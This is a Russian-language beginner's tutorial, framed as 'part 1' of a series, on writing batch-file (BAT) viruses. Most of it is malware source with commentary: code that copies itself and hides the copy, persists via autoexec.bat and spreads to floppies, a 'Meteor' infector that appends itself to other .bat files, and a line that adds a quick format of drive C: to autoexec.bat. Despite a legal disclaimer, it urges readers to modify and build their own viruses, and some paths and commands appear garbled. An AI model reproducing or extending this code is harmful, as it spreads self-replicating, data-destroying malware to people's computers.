Вступление. Недавно качал обновления для Каспера и как будто что-то щелкнуло – задумался о вирусах в целом: о том, какие бывают вирусы, о возможностях тех или иных вирусов, а главное – о написании… Вирусов «расплодилось» - пруд пруди!!! В инете их уйма! Появились сайты, специализирующиеся на вирусах, т.е. сайты, где о вирусах можно не только много чего интересного узнать, но и скачать готовые, скомпилированные, упакованные ZIP’ом вирусочки…;) А тем не менее почти все вируски, выложенные на таких сайтах, палятся. Обидно
… А ведь можно самому писать эти вредоносные проги! Конечно, начинающий вирусописатель не сможет написать такого «монстрика», который бы не палился – сейчас все антивирусные кампании используют технологию обнаружения неизвестных вирусов, и простенькие вирусы, написанные новичком, обязательно спалят! Но мы ж не ламеры! Будем совершенствоваться (ведь эта статья – часть 1). А пока начнем с простого и понятного. Хочу сразу предупредить, что данная статья ориентированна на начинающих вирусописателей (но НЕ на новичков в Хакерстве!). И вот еще что: статья написана в целях ознакомления с возможной опасностью, и за использование нижеизложенной информации в целях нанесения вреда я (автор) не несу никакой ответственности. Ой, нет еще не все (чуть было не забыл):
Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ
1.Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами - наказываются лишением свободы на срок до трех лет со штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев.
2.Те же деяния, повлекшие по неосторожности тяжкие последствия, - наказываются лишением свободы на срок от трех до семи лет
. Вот теперь, пожалуй, все. Начнем.
Начало начал…
Ну, раз уж мы решили начать с самого простого, то свой первый вирус создадим в обычном текстовом редакторе, встроенном в Виндозу. Такой вирус будет называться BAT-вирусом.
По мере написания исходника, в фигурных скобках буду пояснять о чем речь.
@Echo off {запрещаем вывод на экран исполняемых команд}
copy %0 c:virus.bat >nul {копируем файл; запрещаем вывод на экран самой команды и результата её действия}
echo c:virus.bat>>c:autoexec.bat {добавляем текст в уже существующий файл}
Вот и все! Проще не бывает! Это пример одного из самых простых bat-вирусов. Хотя с полной уверенностью сказать, что это вирус, значит сказать ерунду. Посмотрите на то, что написано в фигурных скобках и вы поймете, что это просто пример того, как сделать основу вируса. Продолжаю:
@Echo off
copy %0 c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul {копируем этот файл на дискету, если таковая имеется в дисководе (копирование произойдет при перезагрузке компа)}
Таким образом к предыдущему исходнику я добавил одну строку и вирус приобрел новую способность: он теперь умеет заражать другие компы через дискету.
@Echo off
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul {устанавливаем файлу virus.bat атрибут «скрытый» (файл virus.bat наверняка попадется юзеру на глаза и будет их мозолить
, поэтому делаем его скрытым)}
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul
Вот, наш исходник начинает приобретать очертания вируса!
@Echo off
if exist c:virus.bat goto ski {проверяем, существует ли файл, …}
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
:ski {…если он существует, то программа переходит на метку :ski}
copy %0 a:run.bat >nul
Добавил еще одну команду «if exist». Теперь вирус уже будет проверять, есть ли этот файл, и если он есть, то уже не будут выполняться лишни команды. Только скопирует себя на дискету и все.
Теперь модернизируем наш вирус до конца.
@echo off%[Meteor]% {выводим на экран текст «Meteor»}
if '%1=='In_ goto Meteo {если переменная %1 равна In, то переходим к метке «:Meteo»}
if exist c:Meteor.bat goto Mete {проверяем, существует ли файл Meteor.bat, если да, то переходим к метке «:Mete»}
if not exist %0 goto Met {если файл не существует, то переходим к метке «Met»}
find "Meteor"c:Meteor.bat {проверяем, есть ли файл meteor на диске, если нет, то копируем его туда}
attrib +h c:Meteor.bat {делаем файл скрытым}
:Mete {метка}
for %%t in (*.bat) do call c:Meteor In_ %%t {выполняем одну команду (call - позволяет вызвать один пакетный файл из другого) для нескольких параметров t} {т.е. вирус находит файл с расширением .bat, и заражает его с помощью команды type, дописывая себя к найденному .bat-файлу}
goto Met {перейти к метке}
:Meteo {метка}
find "Meteor"nul {указываем файлу значение 2 и запрещаем вывод команды и ее результата на экран}
if not errorlevel 1 goto Met {если не произошло ошибки (с кодом 1) выполнения предыдущей команды, то переходим на метку}
type c:Meteor.bat>>%2 {дописываем «себя» к найденному .bat-файлу}
:Met {метка}
Вот это уже можно назвать более или менее полноценным вирусом!
Для того чтобы вирус стал вирусом, его нужно сохранить с расширением BAT. Жмем «Сохранить как», пишем например virus.bat, и там куда вы его сохраните появится пакетный файл MS-DOS.
На основе этого исходника можно создавать другие вирусы. Экспериментируйте, модернизируйте, пробуйте написать свой вирус. Скажу к слову, что используя этот исходник, я сделал из него еще три модификации. И это не предел! Возможности не ограничены, все зависит от вашей фантазии.
Приведу еще один простой, но интересный пример:) @Echo off Echo format C: /q >> c:Autoexec.bat Все! Ничего особенного, да? Этот вирус добавляет в autoexec.bat строку format C: /q и при перезагрузке компа происходит быстрое форматирование диска:) И вот еще что: Echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%mes.js echo WSHShell.Popup ("ПИШИ СЮДА ЧТО УГОДНО"); >> %temp%mes.js start %temp%mes.js deltree /y %temp%mes.js Добавь этот скрипт в свой вирус, вместо «ПИШИ СЮДА ЧТО УГОДНО» напиши свой текст (например, предсмертную речь для юзера:) ), и при запуске вируса вылезет окошечко с твоим сообщением. И на последок! Не шали
!